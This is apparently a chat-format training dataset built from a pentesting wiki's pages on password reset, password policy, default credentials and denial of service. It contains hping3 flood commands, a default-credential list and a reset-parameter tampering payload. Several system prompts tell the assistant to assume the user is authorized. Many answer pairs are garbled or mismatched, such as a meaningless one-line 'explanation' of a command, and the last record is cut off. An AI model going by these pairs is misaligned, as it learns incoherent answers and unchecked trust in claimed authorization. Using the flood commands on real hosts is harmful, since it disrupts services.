{"corpus_index": 1703, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Password reset - Paramater manipulation"}, {"role": "assistant", "content": "(\"form\": {\"email\":\"victim@email.tld\",\"password\":\"12345678\"})"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Password reset - Paramater manipulation", "response": "(\"form\": {\"email\":\"victim@email.tld\",\"password\":\"12345678\"})", "metadata": {"corpus_index": 1704, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `(\"form\": {\"email\":\"victim@email.tld\",\"password\":\"12345678\"})`?"}, {"role": "assistant", "content": "This command is used for 🛠️ password reset - paramater manipulation. Paramater manipulation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `(\"form\": {\"email\":\"victim@email.tld\",\"password\":\"12345678\"})`?", "response": "This command is used for 🛠️ password reset - paramater manipulation. Paramater manipulation", "metadata": {"corpus_index": 1704, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Security policies - Theory in the context of penetration testing"}, {"role": "assistant", "content": "‌Passwords are strings used to authenticate a user or services. They are very important and must meet several criteria because a password that is too weak can easily be guessed via a brute force attack.\n\n* For a simple user: at least twelve alphanumeric characters using minimum two of these following types : upper and lower case letters, numbers and special characters. \n* For a privileged user (administrator): at least twelve alphanumeric characters using minimum three of these following types : upper and lower case letters, numbers and special characters."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Security policies - Theory in the context of penetration testing", "response": "‌Passwords are strings used to authenticate a user or services. They are very important and must meet several criteria because a password that is too weak can easily be guessed via a brute force attack.\n\n* For a simple user: at least twelve alphanumeric characters using minimum two of these following types : upper and lower case letters, numbers and special characters. \n* For a privileged user (administrator): at least twelve alphanumeric characters using minimum three of these following types : upper and lower case letters, numbers and special characters.", "metadata": {"corpus_index": 1705, "category": "credentials", "source_file": "docs/src/web/accounts-and-sessions/security-policies.md", "page_title": "Security policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Security policies - Theory?"}, {"role": "assistant", "content": "‌Passwords are strings used to authenticate a user or services. They are very important and must meet several criteria because a password that is too weak can easily be guessed via a brute force attack.\n\n* For a simple user: at least twelve alphanumeric characters using minimum two of these following types : upper and lower case letters, numbers and special characters. \n* For a privileged user (administrator): at least twelve alphanumeric characters using minimum three of these following types : upper and lower case letters, numbers and special characters."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Security policies - Theory?", "response": "‌Passwords are strings used to authenticate a user or services. They are very important and must meet several criteria because a password that is too weak can easily be guessed via a brute force attack.\n\n* For a simple user: at least twelve alphanumeric characters using minimum two of these following types : upper and lower case letters, numbers and special characters. \n* For a privileged user (administrator): at least twelve alphanumeric characters using minimum three of these following types : upper and lower case letters, numbers and special characters.", "metadata": {"corpus_index": 1705, "category": "credentials", "source_file": "docs/src/web/accounts-and-sessions/security-policies.md", "page_title": "Security policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Security policies - Practice work?"}, {"role": "assistant", "content": "Check when registering on the application if those criteria are required to set a password and if we can bypass the policy.\n\n* Is the password policy strong enough ?\n* Is the password policy applied ? On the front end? On the Back End?"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Security policies - Practice work?", "response": "Check when registering on the application if those criteria are required to set a password and if we can bypass the policy.\n\n* Is the password policy strong enough ?\n* Is the password policy applied ? On the front end? On the Back End?", "metadata": {"corpus_index": 1706, "category": "credentials", "source_file": "docs/src/web/accounts-and-sessions/security-policies.md", "page_title": "Security policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Security policies - Practice?"}, {"role": "assistant", "content": "Check when registering on the application if those criteria are required to set a password and if we can bypass the policy.\n\n* Is the password policy strong enough ?\n* Is the password policy applied ? On the front end? On the Back End?"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Security policies - Practice?", "response": "Check when registering on the application if those criteria are required to set a password and if we can bypass the policy.\n\n* Is the password policy strong enough ?\n* Is the password policy applied ? On the front end? On the Back End?", "metadata": {"corpus_index": 1706, "category": "credentials", "source_file": "docs/src/web/accounts-and-sessions/security-policies.md", "page_title": "Security policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Account creation - Theory"}, {"role": "assistant", "content": "When creating an account the presence of a captcha is important. It helps to differentiate a real human user from a malicious computer program used by an attacker. In theory, when characters are distorted, robots are unable to decipher them.\n\nThis visual test is a security measure to prevent a website or forum from being flooded with spam, advertising messages and fake users for example."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Account creation - Theory", "response": "When creating an account the presence of a captcha is important. It helps to differentiate a real human user from a malicious computer program used by an attacker. In theory, when characters are distorted, robots are unable to decipher them.\n\nThis visual test is a security measure to prevent a website or forum from being flooded with spam, advertising messages and fake users for example.", "metadata": {"corpus_index": 1707, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/signing-in.md", "page_title": "Account creation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Account creation - Theory"}, {"role": "assistant", "content": "When creating an account the presence of a captcha is important. It helps to differentiate a real human user from a malicious computer program used by an attacker. In theory, when characters are distorted, robots are unable to decipher them.\n\nThis visual test is a security measure to prevent a website or forum from being flooded with spam, advertising messages and fake users for example."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Account creation - Theory", "response": "When creating an account the presence of a captcha is important. It helps to differentiate a real human user from a malicious computer program used by an attacker. In theory, when characters are distorted, robots are unable to decipher them.\n\nThis visual test is a security measure to prevent a website or forum from being flooded with spam, advertising messages and fake users for example.", "metadata": {"corpus_index": 1707, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/signing-in.md", "page_title": "Account creation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Account creation - Practice"}, {"role": "assistant", "content": "Check for the presence of captcha and others security mechanisms such as email verification."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Account creation - Practice", "response": "Check for the presence of captcha and others security mechanisms such as email verification.", "metadata": {"corpus_index": 1708, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/signing-in.md", "page_title": "Account creation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Account creation - Practice"}, {"role": "assistant", "content": "Check for the presence of captcha and others security mechanisms such as email verification."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Account creation - Practice", "response": "Check for the presence of captcha and others security mechanisms such as email verification.", "metadata": {"corpus_index": 1708, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/signing-in.md", "page_title": "Account creation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Default credentials - Theory?"}, {"role": "assistant", "content": "Default credentials are a really simple and extremely common way to get initial access to a system. Many devices (especially in the Internet of Things) come with default non-random passwords that are often left unchanged. Below is a list of very common credentials :\n\n| Username | Password |\n| ---------- | ---------- |\n| admin | admin |\n| root | root |\n| tomcat | tomcat |\n| password | password |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Default credentials - Theory?", "response": "Default credentials are a really simple and extremely common way to get initial access to a system. Many devices (especially in the Internet of Things) come with default non-random passwords that are often left unchanged. Below is a list of very common credentials :\n\n| Username | Password |\n| ---------- | ---------- |\n| admin | admin |\n| root | root |\n| tomcat | tomcat |\n| password | password |", "metadata": {"corpus_index": 1709, "category": "credentials", "source_file": "docs/src/web/config/default-credentials.md", "page_title": "Default credentials", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Default credentials - Theory?"}, {"role": "assistant", "content": "Default credentials are a really simple and extremely common way to get initial access to a system. Many devices (especially in the Internet of Things) come with default non-random passwords that are often left unchanged. Below is a list of very common credentials :\n\n| Username | Password |\n| ---------- | ---------- |\n| admin | admin |\n| root | root |\n| tomcat | tomcat |\n| password | password |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Default credentials - Theory?", "response": "Default credentials are a really simple and extremely common way to get initial access to a system. Many devices (especially in the Internet of Things) come with default non-random passwords that are often left unchanged. Below is a list of very common credentials :\n\n| Username | Password |\n| ---------- | ---------- |\n| admin | admin |\n| root | root |\n| tomcat | tomcat |\n| password | password |", "metadata": {"corpus_index": 1709, "category": "credentials", "source_file": "docs/src/web/config/default-credentials.md", "page_title": "Default credentials", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Default credentials - Practice?"}, {"role": "assistant", "content": "Default passwords can be found through the following means\n\n* Password lists\n * SecLists Default-Credentials\n * Default Creds Cheatsheet\n * CIRT.net passwords\n * Datarecovery default password\n* defaulty.io Default Passwords Platform\n* Wikipedia's list of most common passwords\n* Google Dorks: intext:'password' intext:'default' Application Name\n* Manual or vendor documentation\n* Source code\n* Physically (e.g. a sticker indicating the default credentials)\n\n> [!TIP]\n> This technique is not to be confused with credential bruteforcing which aims at sending multiple login+password attempts until valid credentials are found. The \"default credentials\" technique aims at finding potential valid creds depending on the information gathered during the reconnaissance phase."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Default credentials - Practice?", "response": "Default passwords can be found through the following means\n\n* Password lists\n * SecLists Default-Credentials\n * Default Creds Cheatsheet\n * CIRT.net passwords\n * Datarecovery default password\n* defaulty.io Default Passwords Platform\n* Wikipedia's list of most common passwords\n* Google Dorks: intext:'password' intext:'default' Application Name\n* Manual or vendor documentation\n* Source code\n* Physically (e.g. a sticker indicating the default credentials)\n\n> [!TIP]\n> This technique is not to be confused with credential bruteforcing which aims at sending multiple login+password attempts until valid credentials are found. The \"default credentials\" technique aims at finding potential valid creds depending on the information gathered during the reconnaissance phase.", "metadata": {"corpus_index": 1710, "category": "credentials", "source_file": "docs/src/web/config/default-credentials.md", "page_title": "Default credentials", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Default credentials - Practice?"}, {"role": "assistant", "content": "Default passwords can be found through the following means\n\n* Password lists\n * SecLists Default-Credentials\n * Default Creds Cheatsheet\n * CIRT.net passwords\n * Datarecovery default password\n* defaulty.io Default Passwords Platform\n* Wikipedia's list of most common passwords\n* Google Dorks: intext:'password' intext:'default' Application Name\n* Manual or vendor documentation\n* Source code\n* Physically (e.g. a sticker indicating the default credentials)\n\n> [!TIP]\n> This technique is not to be confused with credential bruteforcing which aims at sending multiple login+password attempts until valid credentials are found. The \"default credentials\" technique aims at finding potential valid creds depending on the information gathered during the reconnaissance phase."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Default credentials - Practice?", "response": "Default passwords can be found through the following means\n\n* Password lists\n * SecLists Default-Credentials\n * Default Creds Cheatsheet\n * CIRT.net passwords\n * Datarecovery default password\n* defaulty.io Default Passwords Platform\n* Wikipedia's list of most common passwords\n* Google Dorks: intext:'password' intext:'default' Application Name\n* Manual or vendor documentation\n* Source code\n* Physically (e.g. a sticker indicating the default credentials)\n\n> [!TIP]\n> This technique is not to be confused with credential bruteforcing which aims at sending multiple login+password attempts until valid credentials are found. The \"default credentials\" technique aims at finding potential valid creds depending on the information gathered during the reconnaissance phase.", "metadata": {"corpus_index": 1710, "category": "credentials", "source_file": "docs/src/web/config/default-credentials.md", "page_title": "Default credentials", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Denial of Service (DoS) - Theory"}, {"role": "assistant", "content": "There are two distinct types of denial of service:\n\n* Denial of Service (DoS): using a single machine, a DoS attack reduces or prevents accessibility of service for its users. It usually does so by flooding the targeted machine with a consequent amount of requests to overload the system or by exploiting logic flaws that make the target server compute way too much.\n* Distributed Denial of Service (DDoS): a DDoS attack has the same goal as the DoS attack. Except it uses a multitude of compromised machines to cause a denial of service and usually relies on flooding rather than finding and exploiting logical flaws.\n\nThere are various ways to cause a denial of service by flooding such as:\n\n* MAC flooding: flooding a switch with packets using different source MAC addresses.\n* ARP poisoning/spoofing: linking multiple IP addresses with a single MAC address (to a target).\n* Slow HTTP: sending HTTP requests in a slow and fragmented way, one at a time.\n* File upload: exhausting the back-end system's disk space and network bandwidth by uploading lengthy files. Also, uploading a file that will be interpreted in the back-end could cause a DoS, if the file uploaded is malicious and its goal is to overload the system.\n* ICMP flood: flooding the targeted machine with an overwhelming amount of ICMP requests.\n\nThe list is not exhaustive however, one can keep in mind that multiple categories exist, presenting a different approach for conducting a DoS attack: bandwidth, packets, TCP-related components, application layer, etc.\n\nTesting for DoS in engagements can be useful for detecting applications and configurations vulnerabilities, by then providing the client with possible mitigation to prevent DoS attacks."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Denial of Service (DoS) - Theory", "response": "There are two distinct types of denial of service:\n\n* Denial of Service (DoS): using a single machine, a DoS attack reduces or prevents accessibility of service for its users. It usually does so by flooding the targeted machine with a consequent amount of requests to overload the system or by exploiting logic flaws that make the target server compute way too much.\n* Distributed Denial of Service (DDoS): a DDoS attack has the same goal as the DoS attack. Except it uses a multitude of compromised machines to cause a denial of service and usually relies on flooding rather than finding and exploiting logical flaws.\n\nThere are various ways to cause a denial of service by flooding such as:\n\n* MAC flooding: flooding a switch with packets using different source MAC addresses.\n* ARP poisoning/spoofing: linking multiple IP addresses with a single MAC address (to a target).\n* Slow HTTP: sending HTTP requests in a slow and fragmented way, one at a time.\n* File upload: exhausting the back-end system's disk space and network bandwidth by uploading lengthy files. Also, uploading a file that will be interpreted in the back-end could cause a DoS, if the file uploaded is malicious and its goal is to overload the system.\n* ICMP flood: flooding the targeted machine with an overwhelming amount of ICMP requests.\n\nThe list is not exhaustive however, one can keep in mind that multiple categories exist, presenting a different approach for conducting a DoS attack: bandwidth, packets, TCP-related components, application layer, etc.\n\nTesting for DoS in engagements can be useful for detecting applications and configurations vulnerabilities, by then providing the client with possible mitigation to prevent DoS attacks.", "metadata": {"corpus_index": 1711, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Denial of Service (DoS) - Theory during a pentest?"}, {"role": "assistant", "content": "There are two distinct types of denial of service:\n\n* Denial of Service (DoS): using a single machine, a DoS attack reduces or prevents accessibility of service for its users. It usually does so by flooding the targeted machine with a consequent amount of requests to overload the system or by exploiting logic flaws that make the target server compute way too much.\n* Distributed Denial of Service (DDoS): a DDoS attack has the same goal as the DoS attack. Except it uses a multitude of compromised machines to cause a denial of service and usually relies on flooding rather than finding and exploiting logical flaws.\n\nThere are various ways to cause a denial of service by flooding such as:\n\n* MAC flooding: flooding a switch with packets using different source MAC addresses.\n* ARP poisoning/spoofing: linking multiple IP addresses with a single MAC address (to a target).\n* Slow HTTP: sending HTTP requests in a slow and fragmented way, one at a time.\n* File upload: exhausting the back-end system's disk space and network bandwidth by uploading lengthy files. Also, uploading a file that will be interpreted in the back-end could cause a DoS, if the file uploaded is malicious and its goal is to overload the system.\n* ICMP flood: flooding the targeted machine with an overwhelming amount of ICMP requests.\n\nThe list is not exhaustive however, one can keep in mind that multiple categories exist, presenting a different approach for conducting a DoS attack: bandwidth, packets, TCP-related components, application layer, etc.\n\nTesting for DoS in engagements can be useful for detecting applications and configurations vulnerabilities, by then providing the client with possible mitigation to prevent DoS attacks."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Denial of Service (DoS) - Theory during a pentest?", "response": "There are two distinct types of denial of service:\n\n* Denial of Service (DoS): using a single machine, a DoS attack reduces or prevents accessibility of service for its users. It usually does so by flooding the targeted machine with a consequent amount of requests to overload the system or by exploiting logic flaws that make the target server compute way too much.\n* Distributed Denial of Service (DDoS): a DDoS attack has the same goal as the DoS attack. Except it uses a multitude of compromised machines to cause a denial of service and usually relies on flooding rather than finding and exploiting logical flaws.\n\nThere are various ways to cause a denial of service by flooding such as:\n\n* MAC flooding: flooding a switch with packets using different source MAC addresses.\n* ARP poisoning/spoofing: linking multiple IP addresses with a single MAC address (to a target).\n* Slow HTTP: sending HTTP requests in a slow and fragmented way, one at a time.\n* File upload: exhausting the back-end system's disk space and network bandwidth by uploading lengthy files. Also, uploading a file that will be interpreted in the back-end could cause a DoS, if the file uploaded is malicious and its goal is to overload the system.\n* ICMP flood: flooding the targeted machine with an overwhelming amount of ICMP requests.\n\nThe list is not exhaustive however, one can keep in mind that multiple categories exist, presenting a different approach for conducting a DoS attack: bandwidth, packets, TCP-related components, application layer, etc.\n\nTesting for DoS in engagements can be useful for detecting applications and configurations vulnerabilities, by then providing the client with possible mitigation to prevent DoS attacks.", "metadata": {"corpus_index": 1711, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Denial of Service (DoS) - Websites?"}, {"role": "assistant", "content": "::: tabs\n\n=== Stress testing\n\nhping3 is a tool for firewall testing, OS fingerprinting, port scanning, etc. (see manual).\\\nWhat's interesting is its DoS testing capabilities. More examples on hping3.\n\nThe command sends a huge amount of packets with random source addresses to stress firewall state tables and other dynamic tables (IP based) within the TCP/IP stacks and firewall software.\n\n``bash\nhping3 --rand-source --flood $TARGET_IP\n`\n\nThe command sends a huge amount of SYN packets with a specified port.\n\n`bash\nhping3 -S --flood -V -p $TARGET_PORT $TARGET_IP\n`\n\nOther specialized tools can be used such as Hulk and GoldenEye.\n\n> [!CAUTION]\n> hping3, Hulk, and GoldenEye should be used with care and in specific cases. \\\n> The number of requests they can send could crash the targeted system.\n\n=== Directory fuzzing\n\nDirectory fuzzing is a key step during the reconnaissance phase. Depending on the number of threads used, a DoS could happen. Here's an example using Feroxbuster.\n\n`bash\nferoxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS\n``\n\n=== File upload\n\nUnrestricted file upload in a website can lead to DoS by uploading lengthy files.\\\nIf the back-end server interprets any file uploaded (PHP, JSP...), a DoS could occur depending on the goal of the file's code.\n\n=== Input length\n\nBy sending a very long password, a DoS attack can be possible. The password hashing implementation may exhaust its CPU and memory resources.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Denial of Service (DoS) - Websites?", "response": "::: tabs\n\n=== Stress testing\n\nhping3 is a tool for firewall testing, OS fingerprinting, port scanning, etc. (see manual).\\\nWhat's interesting is its DoS testing capabilities. More examples on hping3.\n\nThe command sends a huge amount of packets with random source addresses to stress firewall state tables and other dynamic tables (IP based) within the TCP/IP stacks and firewall software.\n\n``bash\nhping3 --rand-source --flood $TARGET_IP\n`\n\nThe command sends a huge amount of SYN packets with a specified port.\n\n`bash\nhping3 -S --flood -V -p $TARGET_PORT $TARGET_IP\n`\n\nOther specialized tools can be used such as Hulk and GoldenEye.\n\n> [!CAUTION]\n> hping3, Hulk, and GoldenEye should be used with care and in specific cases. \\\n> The number of requests they can send could crash the targeted system.\n\n=== Directory fuzzing\n\nDirectory fuzzing is a key step during the reconnaissance phase. Depending on the number of threads used, a DoS could happen. Here's an example using Feroxbuster.\n\n`bash\nferoxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS\n``\n\n=== File upload\n\nUnrestricted file upload in a website can lead to DoS by uploading lengthy files.\\\nIf the back-end server interprets any file uploaded (PHP, JSP...), a DoS could occur depending on the goal of the file's code.\n\n=== Input length\n\nBy sending a very long password, a DoS attack can be possible. The password hashing implementation may exhaust its CPU and memory resources.\n\n:::", "metadata": {"corpus_index": 1712, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Denial of Service (DoS) - Websites?"}, {"role": "assistant", "content": "::: tabs\n\n=== Stress testing\n\nhping3 is a tool for firewall testing, OS fingerprinting, port scanning, etc. (see manual).\\\nWhat's interesting is its DoS testing capabilities. More examples on hping3.\n\nThe command sends a huge amount of packets with random source addresses to stress firewall state tables and other dynamic tables (IP based) within the TCP/IP stacks and firewall software.\n\n``bash\nhping3 --rand-source --flood $TARGET_IP\n`\n\nThe command sends a huge amount of SYN packets with a specified port.\n\n`bash\nhping3 -S --flood -V -p $TARGET_PORT $TARGET_IP\n`\n\nOther specialized tools can be used such as Hulk and GoldenEye.\n\n> [!CAUTION]\n> hping3, Hulk, and GoldenEye should be used with care and in specific cases. \\\n> The number of requests they can send could crash the targeted system.\n\n=== Directory fuzzing\n\nDirectory fuzzing is a key step during the reconnaissance phase. Depending on the number of threads used, a DoS could happen. Here's an example using Feroxbuster.\n\n`bash\nferoxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS\n``\n\n=== File upload\n\nUnrestricted file upload in a website can lead to DoS by uploading lengthy files.\\\nIf the back-end server interprets any file uploaded (PHP, JSP...), a DoS could occur depending on the goal of the file's code.\n\n=== Input length\n\nBy sending a very long password, a DoS attack can be possible. The password hashing implementation may exhaust its CPU and memory resources.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Denial of Service (DoS) - Websites?", "response": "::: tabs\n\n=== Stress testing\n\nhping3 is a tool for firewall testing, OS fingerprinting, port scanning, etc. (see manual).\\\nWhat's interesting is its DoS testing capabilities. More examples on hping3.\n\nThe command sends a huge amount of packets with random source addresses to stress firewall state tables and other dynamic tables (IP based) within the TCP/IP stacks and firewall software.\n\n``bash\nhping3 --rand-source --flood $TARGET_IP\n`\n\nThe command sends a huge amount of SYN packets with a specified port.\n\n`bash\nhping3 -S --flood -V -p $TARGET_PORT $TARGET_IP\n`\n\nOther specialized tools can be used such as Hulk and GoldenEye.\n\n> [!CAUTION]\n> hping3, Hulk, and GoldenEye should be used with care and in specific cases. \\\n> The number of requests they can send could crash the targeted system.\n\n=== Directory fuzzing\n\nDirectory fuzzing is a key step during the reconnaissance phase. Depending on the number of threads used, a DoS could happen. Here's an example using Feroxbuster.\n\n`bash\nferoxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS\n``\n\n=== File upload\n\nUnrestricted file upload in a website can lead to DoS by uploading lengthy files.\\\nIf the back-end server interprets any file uploaded (PHP, JSP...), a DoS could occur depending on the goal of the file's code.\n\n=== Input length\n\nBy sending a very long password, a DoS attack can be possible. The password hashing implementation may exhaust its CPU and memory resources.\n\n:::", "metadata": {"corpus_index": 1712, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the hping3 syntax for 🛠️ denial of service (dos) - websites?"}, {"role": "assistant", "content": "hping3 --rand-source --flood $TARGET_IP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the hping3 syntax for 🛠️ denial of service (dos) - websites?", "response": "hping3 --rand-source --flood $TARGET_IP", "metadata": {"corpus_index": 1713, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "hping3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Denial of Service (DoS) - Websites"}, {"role": "assistant", "content": "hping3 --rand-source --flood $TARGET_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the 